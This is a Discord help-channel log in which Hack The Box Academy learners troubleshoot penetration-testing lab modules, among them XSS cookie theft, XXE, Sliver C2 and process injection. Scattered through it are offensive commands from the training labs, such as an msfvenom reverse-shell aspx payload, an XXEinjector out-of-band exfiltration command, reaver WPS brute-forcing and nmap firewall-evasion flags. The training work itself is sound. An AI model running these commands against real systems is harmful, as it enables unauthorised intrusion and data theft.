quaint fossil
fathom pendant
#

well the CPTS path isn't just tier 0 modules

#

no need to get pissy over a correction

quaint fossil
#

Whos pissy?

#

You just said something plain obvious and said I'm plain wrong.

#

They should add a bullet point of: "Those who think they know everything"

fathom pendant
#

"HTB is free"; academy is a paid platform - you telling someone 'yeah you can stream stuff' -- i added the correction of only tier 0, then told me 'no shit sherlock'. you got extremely defensive and for what

tribal lark
#

HTB is free if your company pays for it 🤪

old salmon
#

lol

#

Firewall and IDS/IPS Evasion (Hard Lab)

Goal: Identify the version of the service on port 50000/tcp (IBM DB2) for the Hard Lab flag.

The Problem: Despite various evasion techniques, the port consistently shows as filtered, and ncat connections are timing out.

What I’ve Tried (The "Fancy" Stuff):

Source port spoofing (-g 53)

Fragmentation (-f and --mtu 8)

Data padding (--data-length 25)

Decoys (-D RND:10)

What I’ve Tried (The "Un-Fancy" Advice):

Local Port Conflict: I have a listener on 10.255.255.254:53 in Pwnbox. I’ve tried fuser -k and kill -9 on port 53 to allow ncat to bind, but I still hit 'Address already in use' or TIMEOUT.

Manual Bind: Used ncat -nv --source-port 53 -s 172.28.145.11 to bind specifically to my VPN IP and bypass the local conflict. Still resulted in a TIMEOUT.

Target Resets: I’ve reset the instance multiple times and waited for the "shun" to clear before running simple nmap -sV -Pn -g 53 scans. Still filtered.

The Ask: Is there a specific timing (-T) or a different "trusted" source port (besides 53/443) that this instance requires? Or is there a trick to the Pwnbox DNS listener that I’m missing to get a clean ncat connection? Any pointers would be huge!

dark hedge
hollow wind
#

Hey yall! Quick question, I'm working through the Active Directory Enumeration and Attacks module, section Stacking the Deck - Privileged Access, and for the first question, I am unable for the life of me to get the provided bloodhound query that checks for CanPSRemote edges in the ingested data. Is this a known issue? Could it be an issue with how I've ingested the data (I used the provided SharpHound in the c:/tools folder)? Could it be that the query provided is for an older BloodHound version and it's a different query for BloodHound CE? Any ideas or suggestions are welcome, thanks!

SOLVED: I just had to use a more recent version of SharpHound... I guess the older version wasn't picking up the CanPSRemote edges šŸ˜µā€šŸ’«

upper widget
#

I need help in skill assessment of introduction to red teaming AI

barren island
#

Can someone help me with the skill assessment of the module Applications of AI in InfoSec? I was able to train a model with over 90% of Accuracy (locally, but when i submit the model to the machine ACADEMY-AISEC-INTROLAB:5000 i always get Your model accuracy is 0.0....

solar sky
#

Were you able to solve this one eventually? I'm currently stuck at the same part, no clue how to solve it lol

#

Or if anyone else could help me out, I literally ended up copy-pasting the C# code from the module and added the shellcode generated by micr0_shell.py but I am not getting a reverse shell.
I was also sure to change the config to Release, x64 before compiling the build šŸ™

hasty mauve
# solar sky Were you able to solve this one eventually? I'm currently stuck at the same part...

I really have no Idea what was wrong and how I made it work, it's been a while.

I even went to check the DMs with the guy that said "DM ME" to see if anything can refresh my mind, but all what happened in that DM was that I told him to wait as I was testing something to see if it works or not, and it ended up working lol.

But make sure everything is x64 is what I would say.
Make sure the spawned instance of notepad is x64, the shellcode is x64, and the binary being built on x64.
This is everything I remember doing.
Good luck with it.

solar sky
neon echo
steel snow
#

guys

#

i tried DACL

#

and i tried

#

Discretionary

#

BOTH ARE WRONG

#

WHAT

#

NVM

#

NOW IT WORKED

#

weird

#

i tried them yesterday night

#

maybe i was too sleep yor something i wrote it wrong

scenic arrow
#

Hey gang. Working on Easy Assessment for the Attacking Common Services (don't worry, not showing spoilers), but when I found the name of the user, I wasn't able to crack it using Hydra.

solar sky
tidal steppe
#

Hey, I'm re-doing the "Attacking Enterprise Networks" module and I'm stuck on the XSS lab where we have to steal the admin's session cookie.

I followed the exact same steps as described in the academy (and the same approach I used previously when I solved it), including:

  • Setting up the PHP server
  • Hosting script.js and index.php
  • Injecting the XSS payload into the ticket

However, I'm not receiving any requests at all (no hits on script.js or index.php), even after:

  • Resetting the target multiple times
  • Trying different payload variants (external script and inline JS)
  • Verifying my VPN IP and listener

It looks like the bot might not be triggering or not reaching my machine.

Is anyone else experiencing this issue, or could it be a problem with the lab environment?

white vale
tidal steppe
#

What you think I did? xD I've also replicated the steps the academy suggests

white vale
#

Whats your payload like ? Send ss

tidal steppe
white vale
#

If you are using that port then it should match with the php port

tidal steppe
#

i've just changed it

#

and nothing happened

white vale
#

Well maybe try adding things to it

#

'

#

"

#

Anything that could make it work

#

"Payload

tidal steppe
white vale
#

Use "

#

Then the Paylaod

tidal steppe
#

i'll reset the lab and try again

mint rover
tidal steppe
mint rover
#

I have been trying to connect to a module lab for like 30m

#

Restarted few times, nothing

tidal steppe
#

I just reset the lab and now it's working. Maybe it was bugged or something, not sure.

tidal steppe
mint rover
#

Someone is having issues with connectivity too at #cpts

white vale
rotund forum
#

hi

white vale
quasi wave
#

so for information gathering - web edition skills assessment, I am on a question that asks "What is the API key in the hidden admin directory that you have discovered on the target system?" so for that question, I have tried both with nikto and finalrecon to get the hidden API key I discovered on the target system. I found something that looked like a flag in a text file but I don't think that was it? can someone help me out here?

fathom pendant
quasi wave
#

hi is this the right results from exported file from finalrecon (I removed the flag but it won't let me submit the flag because the question is a different question from the one I solved several years ago since it was updated):

ā”Œā”€ā”€(kali㉿kali)-[~/…/share/finalrecon/dumps/fr_inlanefreight.com_28-04-2026_19:12:30]
└─$ cat *                      
200, http://inlanefreight.com:30899/
200, http://inlanefreight.com:30899/index.html
A : 134.209.24.248
AAAA : 2a03:b0c0:1:e0::32c:b001
MX : 10 mail1.inlanefreight.com.
NS : ns1.inlanefreight.com.
NS : ns2.inlanefreight.com.
SOA : ns-161.awsdns-20.com. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
TXT : <FLAG HERE>
DMARC : "v=DMARC1; p=reject; rua=mailto:master@inlanefreight.com; ruf=mailto:master@inlanefreight.com; fo=1;"
Server: nginx/1.26.1
Date: Tue, 28 Apr 2026 23:12:32 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Thu, 01 Aug 2024 09:35:23 GMT
Connection: keep-alive
ETag: "66ab56db-78"
Accept-Ranges: bytes
53
31038
31337
Error: SSL is not Present on Target URL
inlanefreight.com
ns2.inlanefreight.com
support.inlanefreight.com
my.inlanefreight.com
ns1.inlanefreight.com
blog.inlanefreight.com
customer.inlanefreight.com
www.inlanefreight.com
ns3.inlanefreight.com
whois:    Domain Name: INLANEFREIGHT.COM
   Registry Domain ID: 2420436757_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.registrar.amazon
   Registrar URL: http://registrar.amazon.com
   Updated Date: 2025-07-01T22:45:43Z
   Creation Date: 2019-08-05T22:43:09Z
   Registry Expiry Date: 2026-08-05T22:43:09Z
   Registrar: Amazon Registrar, Inc.
   Registrar IANA ID: 468
   Registrar Abuse Contact Email: trustandsafety@support.aws.com
   Registrar Abuse Contact Phone: +1.2024422253
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: NS-1303.AWSDNS-34.ORG
   Name Server: NS-1580.AWSDNS-05.CO.UK
   Name Server: NS-161.AWSDNS-20.COM
   Name Server: NS-671.AWSDNS-19.NET
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
#

actually, is anyone able to DM later about this?

fathom pendant
#

Pretty sure the target is .htb :)

prime copper
#

I cant for the life of me get the password to ssh into user8....Been trying for 20min straight, any help?

This is Intro To WIndows Command Line, Skill Assessment....

#

T_T

#

I tried the previous flags answer as the password, IT JUST DOESN'T WORK

quasi wave
silk geyser
#

Hello everyone. I'm working on a module called Wi-Fi Protected Setup (WPS) Attack.
Part 2 - Using Multiple Pre-defined PINs
The command is sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p 73834410 (I have a different Pin and bssid).
but it freezes and doesn't work, and the bash script doesn't work either. Please help me figure out what the problem is.

dark hedge
#

@eternal vigil you were auto muted by the bot since you used a markdown hyperlink. i removed the timeout, go ahead and remake your post without the markdown hyperlink this time

eternal vigil
#

Thankyou very much

hexed tartan
#

Hello need help in module Cracking EAP-MD5 the last question number 3. I tried to crack but rockyou doesnt have the password in his list

spiral rapids
#

hi

spiral rapids
#

no matter what i do i always get the timeout response

spiral rapids
nocturne river
spiral rapids
#

same. contacted the support but no response

#

will contact you when i figure it out

#

hi, did you solve this?

finite crypt
#

can someone tell me what am I doing wrong here ?
ruby XXEinjector.rb --host=10.10.17.16 --httpport=8000 --file=/home/kali/XXEinjector/xxe.req --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter

xxe.req :-
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.22.95
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 139
Origin: http://10.129.22.95
Connection: keep-alive
Referer: http://10.129.22.95/
Priority: u=0

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

lone egret
#

I am on Windows Lateral Movement - Skills Assessment - question 1 . I am stuck on this pswa for 3 hours already. need a nudge please . i have tried smb , ssh winrm, everying failed and i am with the web portion. when i use http it tells me to switch to https and when i switch to https it times out. please help me

autumn pilot
#

Scan the target and you will find the port

gray yacht
spiral rapids
gray yacht
finite crypt
zealous sandal
#

How did you fix this? The SSH connection keeps dropping, and I can't see the rest of the command output I need.

ebon gulch
gray yacht
finite crypt
alpine lichen
#

Hey everyone, can I ask for a help for optional exercise 1 in Cracking Passwords with Hashcat in the section called Cracking Miscellaneous Files & Hashes?

finite crypt
# ebon gulch What’s is the wrong output?

XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML.
[+] Responding with XML for: /327a6c4304ad5938eaf0efb6cc3e53dc.php
[+] Retrieved data:
[+] Nothing else to do. Exiting.

#

@ebon gulch did you find it ?

ebon gulch
finite crypt
# ebon gulch I do You can show the output

there is no other output but this

XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML.
[+] Responding with XML for: /327a6c4304ad5938eaf0efb6cc3e53dc.php
[+] Retrieved data:
[+] Nothing else to do. Exiting.

ebon gulch
finite crypt
#

it should output a log file as how the section mentions

ebon gulch
#

Try to restart the machine, and try to save the request manually by copy and paste it inside a .req file

finite crypt
#

I also copied the request and pasted it in xxe.req and tried again but yet another failure

could you please test this lab by any chance ?

leaden island
#

Yo guys, im on win privesc, server operators group abuse, im trying to query the appreadiness service, as well as searching for it in running services, but it seems to be stopped

chrome horizon
#

Hello every one im new to the group and to HTB trying figure out how the learning process of the platform, I am currently on the "File Descriptors and Redirection" in the "Linux Fundamental" module. And with the information given i understand the Q1 for the Answer, but Q2, I have the answer, BUT, how was i supposed to get that Answer with the info that was given, above the question,,,,,,, can some one help me with the thought process. Thanks, The New Guy

split pollen
#

I’m stuck on the Pass the Certificate section in Password Attacks under Windows Lateral Movement Techniques, Q1 for jpinkman’s desktop flag.

has anyone seen this error?
KDC has no support for PADATA type (pre-authentication data)

white vale
#

finally

#

part of the cpts tracks! very good box

white vale
#

did you do this part before?

#

I have details steps if you want I could share tips

#

dm me

#

maybe try nc

shy radish
#

I did try

#

no banner

#

nmap would've showed the banner anyway

split pollen
woeful hinge
#

Section 1 of AI Red Teamer Path is so heavy. How are you all handling it without getting entangled in the complex web of math?

tropic current
compact matrix
#

can anyone please help me with the credential hunting page on windows priv esc module
i found so many passwords but none work

faint hamlet
compact matrix
#

found it in the end but whoever made this question should be fired

faint hamlet
#

In section Linux Information Gathering of Pentest in a Nutshell module: it is shown that wpscan can enumerate hash-form plugin.

wpscan -e p --url https://10.129.12.10 --disable-tls-checks --no-banner --plugins-detection aggressive -t 100
<snip>
[i] Plugin(s) Identified:

[+] hash-form
 | Location: <https://10.129.12.10/wp-content/plugins/hash-form/>
 | Last Updated: 2025-01-29T15:54:00.000Z
 | [!] The version is out of date, the latest version is 1.2.4
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - <https://10.129.12.10/wp-content/plugins/hash-form/readme.txt>
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - <https://10.129.12.10/wp-content/plugins/hash-form/readme.txt>

But it no longer works (guess it is not top ~1500 plugin rn). It also does not work with --enumerate vp.
Was able to find it with this and wpscan knows it is vulnerable

 wpscan --url https://10.129.91.116 --disable-tls-checks --no-banner --plugins-detection aggressive --plugins-version-all -e p --plugins-list hash-form
<snip>
[i] Plugin(s) Identified:

[+] hash-form
<snip>```

wpscan has this in vulns. https://wpscan.com/vulnerability/4dda513f-a3d8-4bee-8e2f-ddb71a4d9735/

And yes I have updated wp-scan multiple times.
tulip copper
#
└─$ xfreerdp3 /v:box_ip /u:htb-student
[06:01:14:455] [825068:000c96f6] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]:     : keycode: 0x08 -> no RDP scancode found
[06:01:14:455] [825068:000c96f6] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: ZEHA: keycode: 0x5d -> no RDP scancode found
[06:01:16:394] [825068:000c96f6] [ERROR][com.freerdp.crypto] - [freerdp_tls_handshake]: BIO_do_handshake failed
[06:01:16:394] [825068:000c96f6] [ERROR][com.freerdp.core] - [transport_default_connect_tls]: ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
#

Any advice on this tried changing VPN server TCP/UDP and respawning box a couple of times

#

Checked that I only have one tun interface unsure what else might be causing it not run, able to ping box too

#

nevermind seems rdp isn't working for this box, rdesktop worked tho šŸ™‚

cosmic vine
#

documentation & reporting > section 4 > Documentation & Reporting Practice Lab > Q1

" Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials."

can anyone point me to where the writehat creds are located? i don't see anything listed on htb, there's nothing in the obsidian notebook, and the htb-student creds don't work

somber imp
#

Can someone help me with Sliver

#

The module Intro to C2 with sliver to be specific

autumn pilot
#

feel free to ask your question so others can help

somber imp
#

According to the module, I have to create an .aspx file, and then upload it, and the stager in sliver will catch it and do the rest

#

but 1. generate stager command does not exist anymore, and if I just generate a msfvenom: msfvenom -p windows/shell/reverse_tcp LHOST=<C2-IP> LPORT=<stage-port> -f aspx > sliver.aspx -> it does not connect back to the stager on my c2

autumn pilot
#

If you want to practice with the newer version this step I would suggest to go to the Assumed breach section, get the credentials, establish and RDP session and then play around with the options for the stager

somber imp
#

Is this section buggy?

#

[10.10.15.246] sliver > jobs

ID Name Protocol Port Domains
==== =========== ========== ======= =========
1 grpc/mtls tcp 31337
2 TCP tcp 9001
3 http tcp 9000

[10.10.15.246] sliver > sessions

[*] No sessions šŸ™

[10.10.15.246] sliver > profiles new --http 10.10.15.246:9000 --format shellcode --arch 386 htb2

[*] Saved new implant profile htb2

[10.10.15.246] sliver > stage-listener --url tcp://10.10.15.246:9002 --profile htb2 --prepend-size

[*] Job 4 (tcp) started

[10.10.15.246] sliver > sessions

[*] No sessions šŸ™

[10.10.15.246] sliver > stage-listener --url tcp://10.10.15.246:9002 --profile htb2 --prepend-size

autumn pilot
#

I don't think so as at the time of writing on the given Sliver version it worked

somber imp
#

Ohh, cool then buddy

#

Let me do what you suggested

rotund forum
#

what does the c... mean?

#

i dont know what they mean with those channels

#

can anybody explain?

scenic arrow
#

I'm working on the Hard assessment in "Attacking Common Services" module. I used Hydra to get Fiona's creds, able to connect to mssql, but I can't for the life of me figure out out to switch to John. I've tried Hydra, "exec_as_login / user", etc... I'm losing my mind šŸ˜„
EDIT: nvm... EXECUTE AS LOGIN = 'john'

abstract jacinth
#

hello, is there anyone that can you help me for last question of advancec sql injection on skills assesment

wild sage
#

I need some help trying to figure out getting into jpinkman's account in Password Attacks Module, Pass the Certificate section. I was successfully able to download the certificate (with much head bashing). Now I can't seem to get gettgtpkinit to work and came across this error.

white nova
radiant jolt
#

This XP for weekly steak is too high, like for weekly steak you need to pass too many sections xD

tropic current
edgy pier
#

Hi guys, anyone here can help me for last question in Intro to Assembly language module skill assesment? I used every way to get the flag, every time it gives me failed to run shellcode. Even created a shellcode using msfvenom, still same..

late shuttle
#

Hey guys, doing the hard lab in the footprinting section. Wondering if I need to be cracking something using a wordlist or not.

hallow iris
#

On Introduction to the Windows Command Line, question -

For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them.

There is no route to that network. I am on the target machine but there is no way to pivot. Am I understanding that right?

hallow iris
radiant jolt
tawny karma
#

My ADHD ass finally finished the first module !! clappies

serene topaz
#

can anyone help with nmap module hard lab?

fathom pendant
hallow iris
livid jewel
#

for windows related modules when i xfreerdp into windows machines it always disconnects after a short time and its super annoying. is there anyway to prevent this?

#

and the xfreerdp only successfully works like 1/7 tries

#

or smth like that

cloud urchin
#

do you have multiple vpn's open? are you using the pwnbox at the same time as the vpn?

livid jewel
#

i only have one vpn open and i do not have pwnbox open at the same time

#

the one vpn being openvpn to the htb network with the file they give u to download

livid jewel
cloud urchin
#

that's a good one to do

livid jewel
quasi wave
#

what should I do from here?

acoustic owl
#

@quasi wave I deleted your post because it contained spoilers for a Tier II module

marble jetty
#

Hey all, is there any way to flag outdated module content? the JWT algorithm confusion lab was a PAIN to figure how to get around the provided steps since the cyberchef steps won't work

pale island
#

i am on the password attacks Attacking Active Directory and NTDS.dit: i cannot seem to find a valid username with kerbrute (even with the hint it feels weird why no combination is working) . is it because i am using the wrong domain? currently using Inlanefreight.local and also tried Inlanefreight as domain

scenic arrow
#

Question! Is there a way I can remove a module from the Inprogress list? I enrolled in the Mac OS module, not realizing I'd need physical hardware šŸ™

fresh olive
#

hi, im having some trouble whenever i try to do academy stuff, like nmap scans are insanely long compared to when using the pwnbox, is ther any reason why?

fathom pendant
#

Are you using the pwnbox at the same time as your vm/vpn?

fresh olive
#

Nope i was using just my vpn

#

I used the pwnbox after

novel matrix
#

We dont require you to have physical hardware

cloud urchin
#

but yeah not required

scenic arrow
#

Literally says it on the Module Details... lol

acoustic owl
spark yacht
#

it is indeed a pain

last musk
#

Stuck on Information Gathering - Web Edition skill assessment Q3 I have all the other answers but when I go to the hidden directory I get timed out?

#

Is this a error

cosmic marten
#

Attacking Common Applications Challange Lab 1 - the lab keeps timing out.
I booted the lab about 20 minutes ago, gave it 10 minutes of peace, run nmap got a few open ports, went to make notes, and now I can't interact with the ports, they time out, and now nmap says host is down.

#

The online chat does not do technical support, so am I right to ask in here? if not, please redirect me to the correct channel/person

cosmic marten
#

Is anyone else experiencing labs that are on for a little bit and then they time out for a few minutes?

#

it's so frustrating, this has been persisting for weeks

#

I don't know if it's just my lab but I'm wasting so much time, it's insane. I feel like i've been scammed by HTB subscription...

cloud urchin
quasi wave
#

I need reconspider to to work for a specific module but the API key isn't working. I modified the /etc/reconspider/reconspider.conf file to include the API key but its asking for another API key

#

can someone help me with this?

#

I don't get why this is such a problem

dim nexus
#

Hi, I'm working on the "Applications of AI in InfoSec" course, specifically the Spam Detector model evaluation section.

I'm using the Playground VM with Jupyter. When I try to download the SMS Spam Collection dataset from the UCI repository using:

python
import requests
url = "https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip"
response = requests.get(url)
I get a NameResolutionError — DNS fails to resolve archive.ics.uci.edu. Ping to 8.8.8.8 works, so the VM has basic internet, but external HTTPS requests seem blocked.

The files in my Jupyter directory are: KDD+.txt, demo_dataset.csv, MNIST, malimg_paper_dataset_imgs — none of these are the SMS Spam dataset.

Questions:

Is the SMS Spam dataset supposed to be pre-loaded somewhere in the VM? If so, what's the path?

Is there a local endpoint on the evaluation portal (localhost:8000) to fetch the dataset?

If downloading is required, is there a proxy or alternative method that works in the Playground VM?

Thanks!

fathom pendant
faint hamlet
fathom pendant
flat dune
#

I'm having issues with the Wi-Fi Penetration Testing Basics Module in Section Connecting to Wi-Fi Networks Step 3, I followed the same steps that were provided (both CLI and GUI) and it can't establish a connection. Tried restarting the lab a few times, nothing.

šŸ”— https://academy.hackthebox.com/app/module/222/section/3202

hollow wind
#

Why is there such a big spike in dificulty in linux fundamentals section 10?

tawny karma
#

Ahah, i owned root before the module asked to (Spoiling getting started module a bit) hihi

dusk holly
#

i am currently attempting AEN blindly and i am stuck, can i DM anyone for nudge or a little help

hidden ledge
gray yacht
gray yacht
flat dune
flat dune
#

@gray yacht Can I DM?

gray yacht
foggy crow
#

hello. can someone help me with the module Wi-Fi Password Cracking Techniques? i cant get of the section one. im on arch linux, i used opevpn to acess, and im still stuck on introduction. when i login via remmina, i access the desktop. i manage to change my interface into a monitor mode, but when i use the command provided, so:
airodump-ng wlan0mon -c 1 -w WPA
the device i discover dont have this EAPOL note. what am i doing wrong?

gray yacht
foggy crow
#

i was mistaken, i was talking about section 2

foggy crow
gray yacht
foggy crow
#

right. i forgot i could use ssh i assumed i had to use RDP client as it said to RDP into. i'll try with ssh now

foggy crow
#

oh okay now it hit me

#

i had to de-authenticate first

#

okay i de-authenticated first, but still got the same problem. there's no 4 way handshake

#

maybe i'll try to do the same with pwnbox tough i doubt id make a difference

placid edge
#

ok to dm?

gray yacht
placid edge
#

i still have this issue even on x64 bit

#

the log just says it times out, even tested against locally and remotely on other systems and all works fine, except this machine

#

idk what is going on here

#

i get the following error each time

03/2026 07:20:59] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Undetected by Microsoft Defender Antivirus
[05/03/2026 07:20:59] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Running C:\Alpha\ProcessInjection\ConsoleApp3.exe
[05/03/2026 07:21:00] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Checking for calc.exe...
[05/03/2026 07:21:45] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Timeout reached, killing process
cloud urchin
# placid edge i still have this issue even on x64 bit

You have to follow it all precisely as the module shows. Not using x64 and not using the release version is the biggest reason I see this not working for people. Also do it in C# like the module teaches. Should work for you then.

placid edge
placid edge
#

.net version you mean?

#

or visual studio?

cloud urchin
#

that matters too, but not that's not what i was talking about

#

make sure to follow ALL the steps

placid edge
#

tried on .net 4.7.2 and 4.8.

#

on 2022 vs

#

but i suppose you mean microshell?

cloud urchin
#

should be C#

#

oh wait i may be thinking of another section, which section are you on?

#

i thought you were talking about static analysis

placid edge
#

process injection

#

yeah

cloud urchin
#

same thing though, you still need c# console app (.net framework), release version, x64, etc

placid edge
#

i swear i have all of those correct

#

Currently i set it up with .net 4.8 as well

cloud urchin
#

not familiar with that config thing i used VS

placid edge
#

when i run the exe file on any other system now, localhost ect, even tested from a azure vm and it all worked fine and i got the shell

#

the only place it doesnt work is on the target lol

gray yacht
placid edge
#

yup

gray yacht
placid edge
#

sure

solar sky
cyan veldt
#

In Blind SQL Injection
Section: Remote Code Execution

I solved this section in Linux, using Netcat as a listener. However, when I try it in windows via powershell, I get GET /ncat.exe HTTP/1.1" 200 but it doesn't show anything on the listener

#

This is a general question that is not limit to Blind SQL injection

#

if anyone knows how to run netcat properly in powersell please let me know

hollow wind
#

is it important to be able to memorize the find <> command with all its options on section 10 linux fundamentals?

red echo
#

did anyone got stuck on the skills assessment of ffuf module? The question 3 specifically, its asking for the full page URL, i have tried scanning directories for all the subdomain i got, but i have nothing, then i tried looking if anyone else have different commands, they have the same command but have a result. but that result doesn't work on the question, whereas its actually say "You don't have access" according to the question.

vestal bloom
#

Hi guys. I have 1 question for Bypassing Wi-Fi Captive Portals - Skills Assessment Q4. "Explore the captive portal of "Inlane-Internal-Wifi" and gain access to a restricted endpoint." - what is restricted endpoint? I tried endpoint like admin, restricted - no results. ffuf isn't installed on the attack box. any hints?

fresh ingot
fresh ingot
foggy crow
fresh ingot
#

I'm stuck on reconnaissance in the "bypassing captive portals" section (suspect an erratum, but first want to check here).

I'm asked to connect to HTB-Guest and find the gateway IP.

192.168.2.1 is the WRONG answer, dispite the highlighted output in the added screenshot.

Can someone expose my flaw in reasoning?

ocean night
#

I reproduced the issue, best thing is to raise it in #1234357888114364508 so that the team can correct the issue when able

cloud urchin
#

Tried it myself same thing, looks like a bug they have to fix. Worked months ago when I did that section, got a totally different result.

ocean night
indigo pendant
#

Module Name : Understanding Log Sources & Investigating with Splunk
Section 2/6 : Using Splunk Applications

Question : Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local

I can't solve it! The command that needs fixing is: `sysmon` process=net.exe (CommandLine="net view") | stats count by Computer,CommandLine

my failed attempt : `sysmon` EventCode=1 Image="*net.exe*" CommandLine="*net view*"
| stats count by Computer, CommandLine

ocean night
gray yacht
high citrus
#

Hi guys, im trying the Password Cracking Attakcs Module, in the first section, Itroduction to John The Ripper, it asks me to crack the password it talked in the module, it is a single command, in single crack mode, and still the password is somehow wrong

#

||Tho i know the password i see is salted, it should give the real password by removing the salt, i guess||

gray yacht
#

Are you stuck on this one?

candid bough
gray yacht
gray yacht
high citrus
#

Yeah, from the password and the content i guess it is the right password. ||The password i get is rolf1911..rr0lf1900 and the module talks about someone names rolf, i tried submitting rr0lf1900 as i think the first part is salt but still nothing||

#

I tried also the full password, only the first part, and so on but nothing

gray yacht
fathom pendant
#

You need the full GEKKO

#

Which is in the reading

foggy sun
#

Hi all, anyone able to help me out on the last question in the NTLM Relaying skills assessment? Can’t figure out how to compromise the DC

modest ivy
#

hi i have an issue with the last network foundations task.

#

the question is what program runs on port 5901 - i connected via vpn, and everything worked, but it said theres nothing running on localhost:5901

#

OR do i have to use the pwnbox on this one?

#

im connected and even have the ip, but it just wont show me the 5901 port

ocean night
#

It's not a service that would be running by default on an instance of Parrot you've installed yourself

modest ivy
#

aw okay! i mean it states clearly in the pwnbox but misleading af that you are able to connect to a vpn etc. it really should be rephrased or need a warning next to it to not use a vpn

#

thank you for the answer!

ocean night
rich galleon
#

Hi

dire summit
#

Hey, could someone point me in the right direction for the final lab in the nmap networking module?

fathom pendant
prime copper
#

Is anyone else here preparing for CJCA?

vestal bloom
#

Hi guys. I have 1 question for Bypassing Wi-Fi Captive Portals - Skills Assessment Q4. "Explore the captive portal of "Inlane-Internal-Wifi" and gain access to a restricted endpoint." - what is restricted endpoint? I tried endpoint like admin, restricted - no results. ffuf isn't installed on the attack box. any hints?

marsh rapids
#

Hi guys, is the lab of the module "Pass the Certificate" from the Password Cracking section working ? I have the following error when requesting a TGT with gettgtpkinit.py : Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)" Is it normal ?

leaden island
#

yo guys, im on win privesc module, im trying to compile UACME's akagi but its not running as intended, is there any resource for pre-built binaries ?

deep copper
#

Hi, on the AI Red Teamer path - has anyone faced the issue where the model upload in the last section of "Application of AI in InfoSec" lead to 0% accuracy, although the model is actually working when tested locally? Are there any specific requirements for the uploaded model to follow?

vestal cairn
#

why...

cloud forum
#

there might be spaces

vestal cairn
#

Lol, I reloaded the page and now It's passed.
Okay, thinking out of the box, got it..

cloud forum
#

academy is doing weird rn]

modest ivy
#

network foundations last task i cannot get it to work, it just wont accept it

#

anyone had the same problem? or do i overlook anything?

modest ivy
cloud forum
#

try ftp instead of nc

brave field
modest ivy
cloud forum
#

you dont know the pw of the attackbox?

modest ivy
#

i do

#

but its not my ftp, no? like the module clearly says i have to use netcat and not ftp and nc works, but just the command simply doesnt work

modest ivy
#

if thats what you mean

#

otherwise im confused

brave field
#

you're literally typing [Ctrl+V][Enter][Enter] as text instead of actually pressing those keys

modest ivy
#

usually i learned everything thats in the SHELL needs to be typed out

brave field
cloud forum
#

yeah

cloud forum
modest ivy
#

so i just type USER anyonymous and press ctrl v before or after sending it?

#

i cant with this wording, this needs to be rewritten man :(

modest ivy
#

okay ill try

#

hmm okay doesnt work i have another idea

brave field
#

After typing USER anonymous, press Ctrl+V, then Enter, then Enter again.

#

that's what it is saying to do

modest ivy
#

yes to go downa line probably

brave field
#

The first Enter (after Ctrl+V) inserts the \r, the second Enter sends the \n and together they make \r\n which FTP requires.

modest ivy
#

i will type it myself then, because after pressing ctrl+v i just sends it

#

well the problem is probably i do it in the pwnbox, ill connect myself with my own mashine and try again

#

the time is up anyway :(

#

okay on my own mashine it worked first try

modest ivy
gusty charm
#

.ortiz

marble quiver
#

is enterprise academy slow or is it a problem on my end?

chilly slate
brave field
chilly slate
#

its loading, but you need to wait like a minute

#

I'm talking about normal academy, not enterprise but I guess the infra is shared

brave field
grand orbit
#

yeah its cooked rn, both arent working for me

cloud forum
#

uhhhhh

inland python
#

how do i really drill the fundamentals into my brain

#

like really hammer it in

rain rivet
#

repetition and note taking

#

come back a week later and do it all again but this time just using your notes

inland python
#

okge

nimble plume
#

Oh thought it was just mine that was incredibly slow

inland python
#

rippity

halcyon yoke
#

Hi,

I need some help with the Hack The Box ā€œGetting Started – Privilege Escalation (Section 11)ā€ lab, specifically Question 2. I would really appreciate if someone could either point me in the right direction or, if possible, explain the full solution so I can understand it properly afterwards.

Here is the task:

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

Hint:
Don't forget to chmod


What I have already done / what works:

I successfully SSHed into the machine as user1:

ssh user1@154.57.164.61 -p 30535
password: password1

